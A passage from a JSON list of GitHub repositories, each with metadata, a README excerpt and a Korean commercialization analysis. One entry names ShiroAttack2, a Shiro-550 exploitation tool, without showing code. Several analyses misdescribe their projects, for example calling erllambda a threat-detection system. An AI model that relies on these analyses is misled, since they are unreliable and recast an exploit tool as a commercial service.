src=\"https://img.shields.io/github/stars/edeneast/nightfox.nvim?colorA=192330&colorB=719cd6&style=for-the-badge\"></a>\n  <a href=\"https://github.com/edeneast/nightfox.nvim/issues\"><img src=\"https://img.shields.io/github/issues/edeneast/nightfox.nvim?colorA=192330&colorB=dbc074&style=for-the-badge\"></a>\n  <a href=\"https://github.com/edeneast/nightfox.nvim/contributors\"><img src=\"https://img.shields.io/github/contributors/edeneast/nightfox.nvim?colorA=192330&colorB=81b29a&style=for-the-badge\"></a>\n  <a href=\"https://github.com/EdenEast/nightfox.nvim/network/members\"><img src=\"https://img.shields.io/github/forks/edeneast/nightfox.nvim?colorA=192330&colorB=9d79d6&style=for-the-badge\"></a>\n</p>\n\n<p align=\"c","composite_score":0.0158,"license_safety_tag":"safe"},{"name":"iorate/uBlacklist","github_url":"https://github.com/iorate/uBlacklist","stars":11,"language":"TypeScript","license":"MIT","abandonment_months":0,"description":"# uBlacklist 자산 분석\n\n## 왜 보물인가\n검색 결과에서 원하지 않는 웹사이트를 차단하는 개인 맞춤형 필터링 도구로, 사용자가 더 깔끔한 검색 경험을 얻을 수 있게 해줍니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 기업용 검색 품질 관리 플랫폼으로 확장하여 조직 내 직원들의 검색을 통제하고 모니터링하는 서비스\n2. **내부 업무","readme_excerpt":"# uBlacklist\n\nEnglish | [Deutsch](README.de.md) | [简体中文](README.zh-CN.md)\n\nBlocks specific sites from appearing in Google search results\n\n[Chrome Web Store](https://chrome.google.com/webstore/detail/ublacklist/pncfbmialoiaghdehhbnbhkkgmjanfhe) / [Firefox Add-ons](https://addons.mozilla.org/en-US/firefox/addon/ublacklist/) / [App Store](https://apps.apple.com/us/app/ublacklist-for-safari/id1547912640) (for macOS and iOS, thanks to [Group-Leafy](https://github.com/HoneyLuka/uBlacklist/tree/safari-port/safari-project))\n\n## Description\n\nThis extension prevents the sites you specify from appearing in Google search results.\n\nYou can add rules on search result pages, or on sites to be blocked by clicking the toolbar icon. Rules can be specified either by [match patterns](https://ublacklist.github.io/docs/advanced-features#match-patterns) (e.g. `*://*.example.com/*`) or by [expressions](https://ublacklist.github.io/docs/advanced-features#expressions) including regular expressions, variables an","composite_score":0.0158,"license_safety_tag":"safe"},{"name":"TimUntersberger/neogit","github_url":"https://github.com/TimUntersberger/neogit","stars":7,"language":"Lua","license":"MIT","abandonment_months":0,"description":"# TimUntersberger/neogit 분석\n\n## 왜 보물인가\n깃(Git)이라는 복잡한 개발자 도구를 더 간단하고 시각적으로 사용할 수 있게 만든 프로젝트입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 개발자용 통합 개발 환경(IDE) 플러그인으로 월 구독료 모델 제공\n2. **내부 업무 도구**: 대형 소프트웨어 회사의 개발팀이 ","readme_excerpt":"<div align=\"center\">\n    <div>\n        <div><img src=\"https://github.com/NeogitOrg/neogit/assets/7228095/7684545f-47b5-40e2-aedd-ccf56e0553f4\" width=\"400px\"/></div>\n        <div><h1>Neogit</h1></div>\n    </div>\n    <table>\n        <tr>\n            <td>\n                <strong>A git interface for <a href=\"https://neovim.io\">Neovim</a>, inspired by <a href=\"https://magit.vc\">Magit</a>.</strong>\n            </td>\n        </tr>\n    </table>\n\n  [![Lua](https://img.shields.io/badge/Lua-blue.svg?style=for-the-badge&logo=lua)](http://www.lua.org)\n  [![Neovim](https://img.shields.io/badge/Neovim%200.10+-green.svg?style=for-the-badge&logo=neovim)](https://neovim.io)\n  [![MIT](https://img.shields.io/badge/MIT-yellow.svg?style=for-the-badge)](https://opensource.org/licenses/MIT)\n  <a href=\"https://dotfyle.com/plugins/NeogitOrg/neogit\">\n    <img src=\"https://dotfyle.com/plugins/NeogitOrg/neogit/shield?style=for-the-badge\" />\n  </a>\n</div>\n\n\n![preview](https://github.com/NeogitOrg/neogit/assets/7228","composite_score":0.0156,"license_safety_tag":"safe"},{"name":"hooray/fantastic-admin","github_url":"https://github.com/hooray/fantastic-admin","stars":7,"language":"Vue","license":"MIT","abandonment_months":0,"description":"# Fantastic Admin 분석 보고서\n\n## 왜 보물인가\n복잡한 웹 관리 화면을 빠르게 만들 수 있는 완성도 높은 템플릿으로, 작은 팀도 대기업 수준의 관리 시스템을 구축할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 고객 관리 대시보드가 필요한 클라우드 소프트웨어(예: 이메일 마케팅 플랫폼)의 기본 화면 제공\n2. **내","readme_excerpt":"**中文** | [English](./README.EN.md)\n<a href=\"https://fantastic-admin.hurui.me\" target=\"_blank\"><img src=\"https://fantastic-admin.hurui.me/logo.svg\" align=\"right\" height=\"80\" alt=\"logo\" /></a>\n\n# Fantastic-admin\n\n面向 **AI** 的管理系统框架\n\n<p>\n  <a href=\"https://fantastic-admin.hurui.me\" target=\"_blank\">官网</a>\n  <span>&nbsp;|&nbsp;</span>\n  <a href=\"https://fantastic-admin.pages.dev\" target=\"_blank\">备用地址</a>\n</p>\n\n<p>\n  <a href=\"###\"><img src=\"https://img.shields.io/github/license/fantastic-admin/basic?label=%E5%BC%80%E6%BA%90%E5%8D%8F%E8%AE%AE&style=flat-square\" alt=\"\" /></a>\n  <a href=\"https://github.com/fantastic-admin/basic/releases\" target=\"_blank\"><img src=\"https://img.shields.io/github/v/release/fantastic-admin/basic?label=%E5%BD%93%E5%89%8D%E7%89%88%E6%9C%AC&style=flat-square\" alt=\"\" /></a>\n</p>\n\n![hero](https://fantastic-admin.hurui.me/hero_preview.png)\n\n## 特点\n\n> 部分为专业版能力\n\n- AI 友好的工程底座，内置多个 Skills\n- 一流的技术栈：Vue 3.6 / Vite 8 / Pinia / UnoCSS / VueUse / TypeScript / ESLint / Stylelint / ..","composite_score":0.0155,"license_safety_tag":"safe"},{"name":"DioxusLabs/docsite","github_url":"https://github.com/DioxusLabs/docsite","stars":196,"language":"Rust","license":"NOASSERTION","abandonment_months":0,"description":"","readme_excerpt":"","composite_score":0.0155,"license_safety_tag":"unknown"},{"name":"ultrajson/ultrajson","github_url":"https://github.com/ultrajson/ultrajson","stars":5,"language":"C++","license":"NOASSERTION","abandonment_months":0,"description":"# UltraJSON 저장소 분석\n\n## 왜 보물인가\nJSON 데이터를 매우 빠르게 처리하는 도구로, 대량의 데이터를 다루는 회사들이 시간과 비용을 크게 절약할 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 데이터 분석 플랫폼에서 고객 데이터를 빠르게 처리하는 핵심 기능으로 제공\n- **내부 업무 도구**: 금융사의 거래 정보 처리 ","readme_excerpt":"# UltraJSON\n\n[![PyPI version](https://img.shields.io/pypi/v/ujson.svg?logo=pypi&logoColor=FFE873)](https://pypi.org/project/ujson)\n[![Supported Python versions](https://img.shields.io/pypi/pyversions/ujson.svg?logo=python&logoColor=FFE873)](https://pypi.org/project/ujson)\n[![PyPI downloads](https://img.shields.io/pypi/dm/ujson.svg)](https://pypistats.org/packages/ujson)\n[![GitHub Actions status](https://github.com/ultrajson/ultrajson/workflows/Test/badge.svg)](https://github.com/ultrajson/ultrajson/actions)\n[![codecov](https://codecov.io/gh/ultrajson/ultrajson/branch/main/graph/badge.svg)](https://codecov.io/gh/ultrajson/ultrajson)\n[![DOI](https://zenodo.org/badge/1418941.svg)](https://zenodo.org/badge/latestdoi/1418941)\n[![Code style: Black](https://img.shields.io/badge/code%20style-Black-000000.svg)](https://github.com/psf/black)\n\nUltraJSON is an ultra fast JSON encoder and decoder written in pure C with bindings for\nPython.\n\nInstall with pip:\n\n```sh\npython -m pip install ujson\n```\n\n","composite_score":0.0154,"license_safety_tag":"unknown"},{"name":"kayak/fireant","github_url":"https://github.com/kayak/fireant","stars":9,"language":"Python","license":"apache-2.0","abandonment_months":1,"description":"# Fireant 저장소 분석\n\n## 왜 보물인가\n실시간 데이터 분석과 시각화를 자동으로 처리해주는 도구로, 복잡한 데이터를 한눈에 이해할 수 있게 만들어줍니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 중소 기업의 매출, 재고, 고객 데이터를 자동으로 분석해주는 대시보드 구독 서비스\n- **내부 업무 도구**: 기업 내부에서 판매팀, 마케팅","readme_excerpt":"FireAnt - Analytics and Reporting\n=================================\n\n.. _intro_start:\n\n|BuildStatus|  |CoverageStatus|  |Codacy|  |Docs|  |PyPi|  |License|\n\n\n|Brand| is a a data analysis tool used for quickly building charts, tables, reports, and dashboards. It defines a schema for configuring metrics and dimensions which removes most of the leg work of writing queries and formatting charts. |Brand| even works great with Jupyter notebooks and in the Python shell providing quick and easy access to your data.\n\n.. _intro_end:\n\nRead more at http://fireant.readthedocs.io/en/latest/\n\nInstallation\n------------\n\n.. _installation_start:\n\nTo install |Brand|, run the following command in the terminal:\n\n.. code-block:: bash\n\n    pip install fireant\n\n\n.. _installation_end:\n\nIntroduction\n------------\n\n|Brand| arose out of an environment where several different teams, each working with data sets often with crossover, were individually building their own dashboard platforms. |Brand| was developed as a","composite_score":0.0153,"license_safety_tag":"safe"},{"name":"alertlogic/erllambda","github_url":"https://github.com/alertlogic/erllambda","stars":47,"language":"Erlang","license":"NOASSERTION","abandonment_months":1,"description":"# alertlogic/erllambda 상용화 분석\n\n## 왜 보물인가\n클라우드 서버에서 발생하는 보안 위협을 자동으로 감지하고 대응하는 기술로, 기업의 사이버 공격 피해를 줄일 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 중소기업을 위한 월간 구독형 보안 모니터링 서비스로 판매\n2. **내부 업무 도구**: 대기업 IT 부서에","readme_excerpt":"erllambda\n=========\n\nEnable AWS Lambda functions to be written in Erlang\n\n![logo](doc/pics/erllambda_logo_small.png)\n\n# Overview\n\nThe `erllambda` library provides all functionality needed to build and\ndeploy fully functional [AWS Lambda](https://aws.amazon.com/lambda/)\nfunctions, written entirely in Erlang.\n\nErlang Lambda functions implement a simple two function behavior:\n\n```erlang\n-module(hello_lambda).\n\n-behavior(erllambda).\n-export([handle/2]).\n\n-spec handle( Event :: map(), Context :: map() ) -> {ok, Body} | {error, ErrorBody}.\nhandle( Event, Context ) ->\n    erllambda:succeed( \"Hello Event ~p\", [Event] ).\n```\n\nThere are really two ways to get started.  First you can checkout and review\nthe\n[`erllambda_example`](https://github.com/alertlogic/erllambda_example/blob/master/README.md)\nproject.  This is a complete working AWS Lambda written in Erlang, with the\ngoal of demonstrating the capabilities available as part of the framework,\nand how to write Lambda functions for different pu","composite_score":0.0153,"license_safety_tag":"unknown"},{"name":"netlify/gotrue","github_url":"https://github.com/netlify/gotrue","stars":10,"language":"Go","license":"mit","abandonment_months":0,"description":"# netlify/gotrue 분석 보고서\n\n## 왜 보물인가\n웹사이트나 앱에서 사용자 로그인과 회원 관리를 간단하게 처리해주는 핵심 기술로, 많은 기업들이 필요로 하는 필수 인프라입니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 협업 도구나 프로젝트 관리 플랫폼의 사용자 인증 시스템 구축\n- **내부 업무 도구**: 회사 직원만 접근할 수 ","readme_excerpt":"![GoTrue](gotrue.png)\n\n<p align=\"center\">User management for APIs</p>\n\nGoTrue is a small open-source API written in Golang, that can act as a self-standing\nAPI service for handling user registration and authentication for Jamstack projects.\n\nIt's based on OAuth2 and JWT and will handle user signup, authentication and custom\nuser data.\n\n## Configuration\n\nYou may configure GoTrue using either a configuration file named `.env`,\nenvironment variables, or a combination of both. Environment variables are prefixed with `GOTRUE_`, and will always have precedence over values provided via file.\n\n### Top-Level\n\n```properties\nGOTRUE_SITE_URL=https://example.netlify.com/\n```\n\n`SITE_URL` - `string` **required**\n\nThe base URL your site is located at. Currently used in combination with other settings to construct URLs used in emails.\n\n`OPERATOR_TOKEN` - `string` _Multi-instance mode only_\n\nThe shared secret with an operator (usually Netlify) for this microservice. Used to verify requests have been pro","composite_score":0.0153,"license_safety_tag":"safe"},{"name":"nextdns/nextdns","github_url":"https://github.com/nextdns/nextdns","stars":5,"language":"Go","license":"MIT","abandonment_months":1,"description":"# NextDNS 저장소 분석\n\n## 왜 보물인가\n인터넷 연결 시 광고 차단, 악성 사이트 차단, 개인정보 보호를 자동으로 해주는 기술로, 개인부터 기업까지 모두가 필요로 하는 핵심 인프라입니다.\n\n## 어디에 쓸 수 있나\n\n**1. 가정용 DNS 보안 SaaS**\n- 가족의 인터넷 사용을 안전하게 관리하는 구독 서비스로 출시 (월 $5-15)\n\n**2. ","readme_excerpt":"# NextDNS CLI Client\n\nNextDNS CLI is a command-line tool that allows you to use [NextDNS](https://nextdns.io)'s DNS-over-HTTPS (DoH) service with advanced capabilities. Although the most advanced features will only work with NextDNS, this program can work as a client for any DoH provider or a mix of NextDNS + another DNS (split horizon).\n\nThis CLI is mostly aimed at routers and UNIX based systems, but it is also a great client for Windows and macOS, especially for people who prefer a fully open-source client and don't mind the lack of a GUI.\n\nSee the [wiki](https://github.com/nextdns/nextdns/wiki) for installation and usage instructions.\n","composite_score":0.0153,"license_safety_tag":"safe"},{"name":"SummerSec/ShiroAttack2","github_url":"https://github.com/SummerSec/ShiroAttack2","stars":190,"language":"Java","license":"MIT","abandonment_months":0,"description":"# ShiroAttack2 사업화 분석\n\n## 왜 보물인가\n기업 시스템의 보안 취약점을 찾아내는 도구로, 해킹 피해를 사전에 예방하려는 기업들의 수요가 지속적으로 증가하고 있습니다.\n\n## 어디에 쓸 수 있나\n1. **보안 점검 SaaS**: 중소기업이 월 구독으로 자신의 시스템을 정기적으로 검사받는 서비스\n2. **기업 내부 도구**: 대형 IT회사의 보","readme_excerpt":"# \n\n<h1 align=\"center\" >ShiroAttack2</h1>\n<h3 align=\"center\" >一款针对 Shiro-550 漏洞的快速漏洞利用工具</h3>\n <p align=\"center\">\n    <a href=\"https://github.com/SummerSec/ShiroAttack2\"><img alt=\"ShiroAttack2\" src=\"https://img.shields.io/badge/ShiroAttack2-green\"></a>\n    <a href=\"https://github.com/SummerSec/ShiroAttack2\"><img alt=\"Forks\" src=\"https://img.shields.io/github/forks/SummerSec/ShiroAttack2\"></a>\n     <a href=\"https://github.com/SummerSec/ShiroAttack2\"><img alt=\"Release\" src=\"https://img.shields.io/github/release/SummerSec/ShiroAttack2.svg\"></a>\n  <a href=\"https://github.com/SummerSec/ShiroAttack2\"><img alt=\"Stars\" src=\"https://img.shields.io/github/stars/SummerSec/ShiroAttack2.svg?style=social&label=Stars\"></a>\n     <a href=\"https://github.com/SummerSec\"><img alt=\"Follower\" src=\"https://img.shields.io/github/followers/SummerSec.svg?style=social&label=Follow\"></a>\n     <a href=\"https://github.com/SummerSec\"><img alt=\"Visitor\" src=\"https://visitor-badge.laobi.icu/badge?page_id=SummerSec.Shi","composite_score":0.0152,"license_safety_tag":"safe"},{"name":"GetStream/stream-chat-react-native","github_url":"https://github.com/GetStream/stream-chat-react-native","stars":5,"language":"TypeScript","license":"NOASSERTION","abandonment_months":0,"description":"# GetStream/stream-chat-react-native 분석 보고서\n\n## 왜 보물인가\n스마트폰 앱에서 카카오톡처럼 실시간 채팅 기능을 쉽게 만들 수 있는 완성된 도구입니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 팀 협업 앱이나 소셜 네트워크 서비스에서 즉시 채팅 기능을 추가할 수 있습니다.\n2. **내부 업무 도구**: 회","readme_excerpt":"# Official React Native SDK for Stream Chat\n\n<p align=\"center\">\n  <a href=\"https://getstream.io/chat/react-native-chat/tutorial/\"><img src=\".readme-assets/stream-chat-react-native-cover.png\" alt=\"Stream Chat React Native SDK\" width=\"100%\" /></a>\n</p>\n\n> The official React Native and Expo components for Stream Chat, a service for\n> building chat applications.\n\n[![NPM](https://img.shields.io/npm/v/stream-chat-react-native.svg)](https://www.npmjs.com/package/stream-chat-react-native)\n[![Build Status](https://github.com/GetStream/stream-chat-react-native/actions/workflows/release.yml/badge.svg)](https://github.com/GetStream/stream-chat-react-native/actions)\n[![Component Reference](https://img.shields.io/badge/docs-component%20reference-blue.svg)](https://getstream.io/chat/docs/sdk/reactnative)\n![JS Bundle Size](https://img.shields.io/badge/js_bundle_size-368%20KB-blue)\n\n<img align=\"right\" src=\"https://getstream.imgix.net/images/ios-chat-tutorial/iphone_chat_art@3x.png?auto=format,enhance\" ","composite_score":0.0151,"license_safety_tag":"unknown"},{"name":"lona-web-org/lona","github_url":"https://github.com/lona-web-org/lona","stars":6,"language":"Python","license":"MIT","abandonment_months":1,"description":"# Lona Web Framework 평가 보고서\n\n## 왜 보물인가\n웹사이트를 만드는 과정을 단순화해주는 도구로, 기술 초보자도 빠르게 온라인 서비스를 구축할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 중소 스타트업이 이 도구를 사용해 빠르게 데이터 관리 웹앱(회계, 일정 관리 등)을 개발·판매할 수 있습니다.\n\n2. **내","readme_excerpt":".. image:: doc/content/logo.svg\n    :alt: Lona logo\n    :height: 200px\n    :width: 200px\n.. image:: https://img.shields.io/pypi/l/lona.svg\n    :alt: license MIT\n    :target: https://pypi.org/project/lona\n.. image:: https://img.shields.io/pypi/pyversions/lona.svg\n    :alt: python 3\n    :target: https://pypi.org/project/lona\n.. image:: https://img.shields.io/pypi/v/lona.svg\n    :alt: latest version\n    :target: https://pypi.org/project/lona\n.. image:: https://github.com/lona-web-org/lona/actions/workflows/ci.yml/badge.svg\n    :alt: ci status\n    :target: https://github.com/lona-web-org/lona/actions/workflows/ci.yml\n.. image:: https://img.shields.io/codecov/c/github/lona-web-org/lona.svg\n    :alt: code coverage\n    :target: https://codecov.io/gh/lona-web-org/lona/\n\n\nLona is a web application framework, designed to write responsive web apps in\n**full** Python.\n\n**Demos:** `lona-web.org/demos <https://lona-web.org/demos/index.html>`_\n\n**FAQ:** `lona-web.org/faq <http://lona-web.org/faq.html","composite_score":0.0149,"license_safety_tag":"safe"},{"name":"Cetipoo/solana-onchain-arbitrage-bot","github_url":"https://github.com/Cetipoo/solana-onchain-arbitrage-bot","stars":255,"language":"Rust","license":"NOASSERTION","abandonment_months":0,"description":"","readme_excerpt":"","composite_score":0.0149,"license_safety_tag":"unknown"},{"name":"giventofly/pixelit","github_url":"https://github.com/giventofly/pixelit","stars":5,"language":"JavaScript","license":"MIT","abandonment_months":1,"description":"# pixelit 저장소 분석\n\n## 왜 보물인가\n픽셀 아트나 도트 이미지를 쉽게 만들고 변환할 수 있는 도구로, 게임 개발자나 디자이너들이 직관적으로 사용할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **온라인 픽셀 아트 에디터 SaaS**: 브라우저에서 바로 픽셀 그림을 그리고 공유하는 구독형 서비스\n2. **게임 제작사 내부 도구**: 인디 게임 ","readme_excerpt":"# Pixel It\n\nJavascript library to create pixel art from an image.\nSee [Pixel It](https://giventofly.github.io/pixelit#tryit) in action.\n\n### Index\n\n* [Files](https://github.com/giventofly/pixelit#files)\n* [Examples](https://github.com/giventofly/pixelit#examples)\n* [Documentation](https://github.com/giventofly/pixelit#documentation)\n* [Api](https://github.com/giventofly/pixelit#api)\n* [Local development](https://github.com/giventofly/pixelit#local-development)\n* [Changelog](https://github.com/giventofly/pixelit#changelog)\n\n\n## Files\n\nOn `/dist` you can find the files you need\n\n| file | description  |\n|--|--|\n| [pixelit.js](https://raw.githubusercontent.com/giventofly/pixelit/master/dist/pixelit.js) | javascript es6 file |\n| [pixelitmin.js](https://raw.githubusercontent.com/giventofly/pixelit/master/dist/pixelitmin.js) | javascript minified and babeljs.io parsed for es5 |\n\n\n## Examples\n\nOriginal image and after Pixel It did some work on it.\n\nNo filter applied and color palette used. \n\n!","composite_score":0.0148,"license_safety_tag":"safe"},{"name":"Polymer/lit-element","github_url":"https://github.com/Polymer/lit-element","stars":5,"language":"TypeScript","license":"bsd-3-clause","abandonment_months":0,"description":"# Polymer/lit-element 평가 보고서\n\n## 왜 보물인가\n웹사이트와 앱을 만들 때 반복되는 작업을 자동화하는 도구로, 개발 속도를 3-5배 빠르게 할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **대시보드 SaaS**: 기업용 데이터 분석 플랫폼에서 빠르게 시각화 화면을 구축하는 도구로 판매\n2. **내부 업무 도구**: 중소기업의 직원 ","readme_excerpt":"# LitElement\n\nLitElement is simple base class for creating fast, lightweight web components with [lit-html](https://lit-html.polymer-project.org/).\n\n[![Build Status](https://github.com/lit/lit-element/actions/workflows/tests.yml/badge.svg?branch=master)](https://github.com/lit/lit-element/actions/workflows/tests.yml?query=branch%3Amaster)\n[![Published on npm](https://img.shields.io/npm/v/lit-element.svg)](https://www.npmjs.com/package/lit-element)\n[![Join our Slack](https://img.shields.io/badge/slack-join%20chat-4a154b.svg)](https://lit.dev/slack-invite/)\n[![Mentioned in Awesome lit-html](https://awesome.re/mentioned-badge.svg)](https://github.com/web-padawan/awesome-lit)\n\n## Looking for Lit?\n\nLitElement is now part of the [Lit library monorepo](https://github.com/lit/lit). Lit 2 includes lit-html 2.x and LitElement 3.x. \n\nThis repo contains the code for LitElement 2.x.\n\n## Documentation\n\nFor LitElement 2.x documentation, see the [legacy documentation site](https://lit-element.polymer-","composite_score":0.0147,"license_safety_tag":"safe"},{"name":"elyra-ai/elyra","github_url":"https://github.com/elyra-ai/elyra","stars":5,"language":"Python","license":"Apache-2.0","abandonment_months":0,"description":"# Elyra-AI/Elyra 프로젝트 분석\n\n## 왜 보물인가\n데이터 과학자들이 복잡한 데이터 분석 작업을 마우스 클릭만으로 자동화할 수 있게 도와주는 솔루션입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 기업 고객이 월 구독료를 내고 데이터 분석 자동화 플랫폼을 클라우드에서 이용\n2. **내부 업무 도구**: 대기업의 데이터팀이 사내에","readme_excerpt":"<!--\n{% comment %}\nCopyright 2018-2026 Elyra Authors\n\nLicensed under the Apache License, Version 2.0 (the \"License\");\nyou may not use this file except in compliance with the License.\nYou may obtain a copy of the License at\n\nhttp://www.apache.org/licenses/LICENSE-2.0\n\nUnless required by applicable law or agreed to in writing, software\ndistributed under the License is distributed on an \"AS IS\" BASIS,\nWITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\nSee the License for the specific language governing permissions and\nlimitations under the License.\n{% endcomment %}\n-->\n\n\n[![PyPI version](https://badge.fury.io/py/elyra.svg)](https://badge.fury.io/py/elyra)\n[![Anaconda-Server Badge](https://anaconda.org/conda-forge/elyra/badges/version.svg)](https://anaconda.org/conda-forge/elyra)\n[![Downloads](https://pepy.tech/badge/elyra)](https://pepy.tech/project/elyra)\n[![Documentation Status](https://readthedocs.org/projects/elyra/badge/?version=latest)](https://elyra.readthedoc","composite_score":0.0147,"license_safety_tag":"safe"},{"name":"privacy-ethereum/halo2curves","github_url":"https://github.com/privacy-ethereum/halo2curves","stars":226,"language":"Rust","license":"NOASSERTION","abandonment_months":0,"description":"","readme_excerpt":"","composite_score":0.0147,"license_safety_tag":"unknown"},{"name":"PixelToast/flutter-boxy","github_url":"https://github.com/PixelToast/flutter-boxy","stars":21,"language":"Dart","license":"NOASSERTION","abandonment_months":1,"description":"# flutter-boxy 평가 리포트\n\n## 왜 보물인가\n휴대폰 앱의 화면 레이아웃을 더 자유롭고 쉽게 만들어주는 도구로, 앱 개발자들이 복잡한 작업을 단순화할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. 앱 개발 교육 플랫폼**\n초보 개발자용 온라인 강좌에서 이 도구를 사용한 강의 콘텐츠를 판매하는 구독 서비스\n\n**2. 앱 개발사 내부 도구**","readme_excerpt":"![boxy, Layout made simple](https://i.tst.sh/zncIM.png)\n\n## About\n\nBoxy is a Flutter package created to overcome the limitations of built-in layout widgets, it provides utilities for flex, custom multi-child layouts, dynamic widget inflation, slivers, and more!\n\nThe package is ready for production use, it has excellent documentation, test coverage, and passes strict analysis.\n\nCheck out the new wiki! https://boxy.wiki\n\n## Flex layouts\n\nA common design problem is when you need one or more children of a `Row` or `Column` to have the same cross-axis size\nas another child in the list, with boxy this can be achieved trivially using `BoxyRow`, `BoxyColumn` and `Dominant`.\n\n![Using BoxyRow. A sidebar matches the height of a dynamically sized container](https://i.tst.sh/WDmbR.png)\n\n![Using BoxyColumn. An underbar matches the width of a dynamically sized container](https://i.tst.sh/FdoiA.png)\n\n![Using BoxyColumn and BoxyFlexible.align; The top child has a custom cross axis alignment from the ot","composite_score":0.0146,"license_safety_tag":"unknown"},{"name":"doctrine/collections","github_url":"https://github.com/doctrine/collections","stars":7,"language":"PHP","license":"mit","abandonment_months":1,"description":"# doctrine/collections 상품화 분석\n\n## 왜 보물인가\n수백만 개의 데이터를 효율적으로 정렬하고 필터링하는 기능을 제공하는 핵심 기술로, 복잡한 데이터 처리가 필요한 모든 소프트웨어의 성능을 크게 향상시킬 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 수천 명 사용자의 주문 내역, 고객 정보를 빠르게 검색하고 정렬","readme_excerpt":"# Doctrine Collections\n\n[![Build Status](https://github.com/doctrine/collections/workflows/Continuous%20Integration/badge.svg)](https://github.com/doctrine/collections/actions)\n[![Code Coverage](https://codecov.io/gh/doctrine/collections/branch/3.1.x/graph/badge.svg)](https://codecov.io/gh/doctrine/collections/branch/3.1.x)\n\nCollections Abstraction library\n","composite_score":0.0145,"license_safety_tag":"safe"},{"name":"gnembon/fabric-carpet","github_url":"https://github.com/gnembon/fabric-carpet","stars":5,"language":"Java","license":"MIT","abandonment_months":0,"description":"# Fabric Carpet 저장소 분석\n\n## 왜 보물인가\n마인크래프트 게임의 기능을 확장해주는 개발 도구로, 게임 제작자들이 더 복잡하고 창의적인 콘텐츠를 쉽게 만들 수 있게 해줍니다.\n\n## 어디에 쓸 수 있나\n\n1. **마인크래프트 서버 운영 SaaS**: 게임 서버를 임대해주는 업체가 이 기술을 기본 기능으로 포함하여 고객에게 더 강력한 커스터마이","readme_excerpt":"<img src=\"./src/main/resources/assets/carpet/icon.png\" align=\"right\" width=\"128px\"/>\n\n# Fabric Carpet\n\n[![Development Builds](https://github.com/gnembon/fabric-carpet/actions/workflows/devbuild.yml/badge.svg)](https://github.com/gnembon/fabric-carpet/actions/workflows/devbuild.yml)\n[![CurseForge downloads](http://cf.way2muchnoise.eu/full_349239_downloads.svg)](https://www.curseforge.com/minecraft/mc-mods/carpet)\n[![Modrinth downloads](https://img.shields.io/modrinth/dt/carpet?label=Modrinth%20downloads&logo=modrinth)](https://modrinth.com/mod/carpet)\n[![GitHub downloads](https://img.shields.io/github/downloads/gnembon/fabric-carpet/total?label=Github%20downloads&logo=github)](https://github.com/gnembon/fabric-carpet/releases)\n[![GitHub contributors](https://img.shields.io/github/contributors/gnembon/fabric-carpet?label=Contributors&logo=github)](https://github.com/gnembon/fabric-carpet/graphs/contributors)\n[![Discord](https://badgen.net/discord/online-members/gn99m4QRY4?icon=discord&la","composite_score":0.0145,"license_safety_tag":"safe"},{"name":"vlang/vinix","github_url":"https://github.com/vlang/vinix","stars":7,"language":"V","license":"GPL-2.0","abandonment_months":1,"description":"# Vinix 저장소 분석\n\n## 왜 보물인가\n개발자들이 직접 만드는 운영체제 프로젝트로, 컴퓨터의 기본 뼈대를 새롭게 설계하려는 실험적 시도입니다.\n\n## 어디에 쓸 수 있나\n1. **임베디드 기기용 운영체제**: 스마트폰, 냉장고 등 특정 기기에 최적화된 경량 운영체제 판매\n2. **교육용 플랫폼**: 컴퓨터 공학 학생들이 운영체제 원리를 배우는 학습 ","readme_excerpt":"# Vinix\n\nVinix is an effort to write a modern, fast, and useful operating system in [the V programming language](https://vlang.io).\n\nJoin the [Discord chat](https://discord.gg/S5Nm6ZDU38).\n\n## What is Vinix all about?\n\n- Keeping the code as simple and easy to understand as possible, while not sacrificing\nperformance and prioritising code correctness.\n- Making a *usable* OS which can *run on real hardware*, not just on emulators or\nvirtual machines.\n- Targeting modern 64-bit architectures, CPU features, and multi-core computing.\n- Maintaining good source-level compatibility with Linux to allow to easily port programs over.\n- Exploring V capabilities in bare metal programming and improving the compiler in response to the uncommon needs of bare metal programming.\n- Having fun.\n\n**Note: Vinix is still pre-alpha software not meant for daily or production usage!**\n\n![Screenshot 0](/screenshot0.png?raw=true \"Screenshot 0\")\n![Screenshot 1](/screenshot1.png?raw=true \"Screenshot 1\")\n\n## Download","composite_score":0.0142,"license_safety_tag":"restricted"},{"name":"symfony/polyfill-php81","github_url":"https://github.com/symfony/polyfill-php81","stars":13,"language":"PHP","license":"MIT","abandonment_months":1,"description":"# symfony/polyfill-php81 분석\n\n## 왜 보물인가\n오래된 웹사이트들이 최신 기술을 사용할 수 있도록 호환성을 맞춰주는 번역기 역할을 하는 개발 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **웹호스팅 SaaS**: 클라이언트의 낡은 웹사이트를 현대적인 기술로 업그레이드하지 않고도 최신 기능을 제공하는 호스팅 플랫폼\n2. **내부 업무 도","readme_excerpt":"Symfony Polyfill / Php81\n========================\n\nThis component provides features added to PHP 8.1 core:\n\n- [`array_is_list`](https://php.net/array_is_list)\n- [`enum_exists`](https://php.net/enum-exists)\n- [`MYSQLI_REFRESH_REPLICA`](https://php.net/mysqli.constants#constantmysqli-refresh-replica) constant\n- [`ReturnTypeWillChange`](https://wiki.php.net/rfc/internal_method_return_types)\n- [`CURLStringFile`](https://php.net/CURLStringFile) (but only if PHP >= 7.4 is used)\n\nMore information can be found in the\n[main Polyfill README](https://github.com/symfony/polyfill/blob/main/README.md).\n\nLicense\n=======\n\nThis library is released under the [MIT license](LICENSE).\n","composite_score":0.0142,"license_safety_tag":"safe"},{"name":"lubusIN/laravel-decomposer","github_url":"https://github.com/lubusIN/laravel-decomposer","stars":5,"language":"Blade","license":"mit","abandonment_months":1,"description":"# laravel-decomposer 분석 보고서\n\n## 왜 